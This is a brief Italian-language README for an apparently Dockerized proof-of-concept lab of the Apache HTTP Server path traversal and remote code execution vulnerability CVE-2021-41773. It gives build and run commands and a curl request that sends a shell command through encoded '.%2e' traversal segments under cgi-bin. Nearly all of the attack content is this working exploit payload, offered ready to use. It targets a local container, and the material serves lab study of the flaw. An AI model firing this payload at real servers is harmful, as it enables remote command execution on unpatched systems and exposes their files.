
# Dockerized proof-of-concept per Apache HTTP Server path traversal e RCE (CVE-2021-41773), incluse istruzioni di build e passaggi di sfruttamento basati su curl.
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
Errore di configurazione nel file httpd.conf combinato con Path traversal => RCE
